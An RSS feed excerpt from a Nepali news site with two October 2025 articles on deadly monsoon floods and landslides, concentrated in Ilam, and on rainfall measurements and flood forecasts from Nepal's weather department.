वर्षा गराउने प्रणाली नेपालबाट बाहिरियो : मौसम विभाग https://www.antaranganews.com/?p=35751 https://www.antaranganews.com/?p=35751#respond Sun, 05 Oct 2025 11:31:43 +0000 https://www.antaranganews.com/?p=35751 काठमाडौं– पछिल्ला दुई दिनमा परेको अविरल वर्षाका कारण आएको बाढीपहिरोमा परी मृत्यु हुनेको संख्या ४९ जना पुगेको छ । इलाममा मात्रै ३७ जनाले ज्यान गुमाएका छन् । देशभर गरेर ४९ जनाले ज्यान गएको सशस्त्र प्रहरीले असोज १९ गते जनाएको हो ।
आज दिँउसो साढे १ बजेसम्मको तथ्यांकअनुसार, इलाममा मात्रै ३७ जनाले ज्यान गुमाएको सशस्त्र प्रहरी बलले जनाएको छ । सशस्त्र प्रहरीका सहप्रवक्ता डीएसपी शैलेन्द्र थापाले जारी गर्नु भएको सो विज्ञप्ति अनुसार देशभर गरेर ४९ जनाले ज्यान गएको उल्लेख छ । त्यस्तै, बाढी पहिरोमा परेका सातजना अझै बेपत्ता छन् ।
जल तथा मौसम विज्ञान विभागले बंगालको खाडीबाट विकसित भएर भारत हुँदै नेपाल भित्रिएको यसपटक वर्षा गराउने प्रणाली पूर्वी नेपालबाट बहिरिएर मनसुन कमजोर भई उघ्रिएको छ । तर मनसुन पूर्ण रुपमा नबाहिरिएको विभागले जनाएको छ ।
जल तथा मौसम पूर्वानुमान महाशाखा पहिरोले अधिक मानवीय क्षति भएको इलाममा बितेका २४ घण्टामा ३२२ मिलिमिटर वर्षा भएको छ । विभागका अनुसार इलामका सबै केन्द्रमा २०० मिलिमिटरभन्दा बढी वर्षा भएको छ । कन्याम र माई पोखरीमा २७६ मिलिमिटर वर्षा भएको छ । जो अति भारी वर्षा हो ।
असोज १७ देखि १९ गतेसम्मको मनसुन सक्रियतामा मधेश र बागमती प्रदेशमा भारी वर्षा भयो । बागमती, सप्तकोशी लगायतका नदीहरूमा जलसतह सतर्कता तह पार गरी घट्दो क्रममा छ । कोशी नदी चतरा केन्द्रमा बहाव खतरा तहको नजिकै रहेकोले सतर्कता अपनाउन आग्रह गरिएको छ ।
महाशाखाका अनुसार बितेका २४ घण्टामा मोरङमा २३३, सुनसरीमा २०५, धनकुटामा १६६, धनुषामा १९२, सिन्धुलीमा २०५, सप्तरीमा १८०, रौतहटमा २०५, मकवानपुरमा २२४ मिलिमिटर वर्षा भएको छ ।
आज दिनको २ बजे राष्ट्रिय विपद् जोखिम न्यूनीकरण तथा व्यवस्थापन प्राधिकरणले जनाए अनुसार दुई दिनको वर्षापछि बाढीपहिरोमा परी ४३ जनाको मृत्यु भएको हो भने पाँच जना बेपत्ता भएका र १२ जना घाइते भएका छन् । प्राधिकरणका अनुसार इलामा ३७ जनाको मृत्यु भएको छ । यस्तै रौतहटमा ३, पाँचथरमा १, खोटाङमा १, उदयपुरमा १ जनाको मृत्यु भएको हो ।
त्यस्तै घाइते हुनेहरूमा इलाममा ४, भोजपुरमा ३, खोटाङमा ३, मकवानपुरमा १ र पाँचथरमा एक जना छन् ।
पूर्वी नेपालमा अहिले पनि वर्षा भइरहेको छ ।
२४ घण्टाको अवधिमा २०० मिलिमिटरभन्दा धेरै वर्षा भएमा ‘अति भारी’ वर्षा भनिन्छ । ‘भारी वर्षा’ भनेको २४ घण्टामा ५० मिलिमिटरदेखि १०० मिलिमिटरसम्म वर्षा हो भने ‘धेरै भारी’ भनेको १०० मिलिमिटरदेखि २०० मिलिमिटर पानी पर्नु हो ।
नेपालमा मनसुन बाहिरिने सरदर मिति अक्टोबर २ (असोज १६) गते भए पनि यसपटक केही ढिला गरेर बाहिरिने विभागले आकलन गरेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=35751 0
नेपालमा अझै ३० घण्टा मनुसन सक्रिय रहने प्रक्षेपण https://www.antaranganews.com/?p=35744 https://www.antaranganews.com/?p=35744#respond Sat, 04 Oct 2025 13:26:18 +0000 https://www.antaranganews.com/?p=35744 काठमाडौं– नेपालमा आगामी ३० घण्टा मनसुन सक्रिय रहने प्रक्षेपण गरिएको छ । जल तथा मौसम विज्ञान विभागले त्यस्तो जानकारी असोज १८ गते साँझ दिएको हो ।
अबका ३६ घण्टाका लागि गरिएको मनसुनी प्रणालीको अवस्थिति र सम्भावित फैलावटको विश्लेषणबाट वाग्मती, गण्डकी, मधेस र कोसी प्रदेशका अधिकांश स्थानमा मनसुन सक्रिय हुने देखिएको विभागको भनाइ छ ।
विभागले सक्रिय मनसुनको ठूलो प्रभाव वाग्मती र मधेसमा देखिने हुँदा ती क्षेत्रमा उच्च सतर्कता अपनाउन आग्रह गरेको छ ।
१७ जिल्ला भएर बग्ने नदीमा छ आकस्मिक बाढीको उच्च जोखिम :
यसैबीच, जल तथा मौसम विज्ञान विभागले आज असोज १८ गते दिउँसोसम्म देशका सबै प्रमुख नदीको जलसतह सतर्कता तह भन्दा तल रहेको जनाएको छ । दिउँसो १ः५० बजेसम्म देशका सबै प्रमुख नदीको जलसतह सतर्कता तहभन्दा तल रहे पनि पछिल्लो वर्षाको मापनले जोखिम बढेको विभागको बाढी पूर्वानुमान महाशाखाले जनाएको हो । महाशाखाका अनुसार काठमाडौंको वाग्मती जलाधार र कमला जलाधार क्षेत्रका जलमापन केन्द्रहरूको सतह बढ्दो क्रममा छ । आज राति ती केन्द्रमा सतर्कता तह पार गर्ने सम्भावना छ ।
पछिल्ला ६ घण्टामा मधेस, वाग्मती र कोसी प्रदेशका जिल्लाहरूमा हल्कादेखि मध्यम वर्षा मापन भएको महाशाखाले जनाएको छ । महाशाखाले आज दिउँसोदेखि मधेस, वाग्मती, गण्डकी र लुम्बिनी प्रदेश भई बहने नदीहरूको बहाव उल्लेख्य बढ्न सुरु हुनेछ । विशेषगरी, आज राति नवलपरासी (पूर्व–पश्चिम), तनहुँ, लमजुङ, गोरखा, धादिङ, चितवन, मकवानपुर, बारा, पर्सा, रौतहट, सर्लाही, काठमाडौं, भक्तपुर, ललितपुर, काभ्रे र सिन्धुली र आसपासका जिल्लाहरू भई बहने साना नदीनालामा आकस्मिक बाढीको उच्च जोखिम रहेको जनाएको छ ।
भोलि के कस्तो होला ?
भोलि १९ गतेबिहानदेखि बेलुकीसम्मको अवधिमा नारायणी, कालीगण्डकी, सेती, मादी, मस्र्याङ्दी, दरौँदी, त्रिशूली, पूर्वी राप्ती, वाग्मती र कमलालगायत नदीहरू र तिनका शाखा नदीहरूमा बहाव उल्लेख्य बढ्ने र सतर्कताको तह आसपास पुग्न सक्ने पूर्वानुमान गरिएको महाशाखाको भनाइ छ । महाशाखाले आइतबार रातिदेखि कोशी, कन्काईलगायत नदी जलाधारका क्षेत्रमा समेत बहाव उल्लेख्य बढ्न सक्ने महाशाखाले जानकारी दिएको छ ।
महाशाखाले भनेको छ, ‘कमजोर तथा भिरालो जमिनहरूमा समेत पहिरोको जोखिम रहेकाले आवश्यक सतर्कता अपनाउन अनुरोध छ ।’ बाढी र डुबान हुन सक्ने तटीय क्षेत्रहरूमा उच्च सतर्कता अपनाउन अत्यावश्यक रहेको महाशाखाले उल्लेख गरेको छ ।
काठमाडौंमा लगातार वर्षाको यो क्रम भोलि बिहानसम्मै जारी रहने :
यसैबीच, काठमाडौंमा पछिल्लो १२ घण्टादेखि लगातार वर्षा भइरहेको छ र यो क्रम भोलि बिहानसम्मै जारी रहने मौसमविद्ले बताएका छन् । यो अवधिमा नेपालभरमा वीरगञ्जमा सबैभन्दा धेरै वर्षा भएको छ भने काठमाडौंको नैकापमा बढी वर्षा मापन गरिएको छ ।
काठमाडौंमा गए रातिदेखि निरन्तर वर्षा भइरहेको छ । पछिल्लो ६ घण्टामा काठमाडौंमा सबैभन्दा धेरै नैकापमा वर्षा भएको मौसमविद् डेविड ढकालले बताउनु भएको छ । उहाँका अनुसार पछिल्लो ६ घण्टामा नैकापमा ३९ मिलिमिटर वर्षा भएको छ । त्यस्तै, पानीपोखरीमा २५.२, कपनमा २४.४, सुन्दरीजलमा २१.८ र बबरमहलमा २१ मिलिमिटर वर्षा भएको ढकालको भनाइ छ ।
उता, वीरगञ्जमा ७८.८ मिलिमिटर वर्षा मापन गरिएको उहाँले जानकारी दिनु भयो । उहाँका अनुसार बारा, पर्सा, सर्लाही, रौतहटमा अन्य स्थानमा भन्दा धेरै वर्षा भइरहेको छ । मौसमविद् ढकालले भन्नुभयो, ‘काठमाडौंमा आज दिनभर र राति पनि यस्तै वर्षा हुनेछ । केही समय केही कम वर्षा भएजस्तो भए पनि पुनः वर्षा बढ्नेछ, दिउँसोजस्तै यही अनुपातमा वर्षा हुनेछ ।’
हाल देशभर बङ्गालको खाडीबाट आएको जलवाष्पयुक्त हावाका कारण वर्षा भइरहेको तथा फेरि अर्को प्रणाली पनि सक्रिय हुने सम्भावना बढेकाले आज राति पनि धेरै स्थानमा वर्षा हुने विभागले उल्लेख गरेको छ ।
कहाँ कति वर्षा मापन भयो ?
बितेका १२ घण्टामा सबैभन्दा बढी वर्षा पर्साको वीरगञ्जमा भएको जल तथा मौसम पूर्वानुमान महाशाखाले जनाएको छ । महाशाखाका अनुसार वीरगञ्जमा १४३ मिलिमिटर वर्षा भएको छ । बारामा १४०.४, रौतहटको गौर वर्षा मापन केन्द्रमा १२९, रौतहटकै महेशपुरमा १२४ मिलिमिटर वर्षा भएको छ ।
देशको मध्य क्षेत्रमा बढी वर्षा भएको र तराइ केन्द्रित रहेको, नवलपरासीदेखि पूर्व धनकुटासम्म वर्षा भएको जनाएको छ । पचास भन्दा बढी मापन केन्द्रहरूमा ३० मिलिमिटरदेखि ५० मिलिमिटरसम्म वर्षा भएको छ । सो अवधिमा सिन्धुपाल्चोकदेखि दोलखासम्म र काठमाडौँ उपत्यकालगायत १४ वटा जिल्लामा ५० मिलिमिटरभन्दा माथि वर्षा भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=35744 0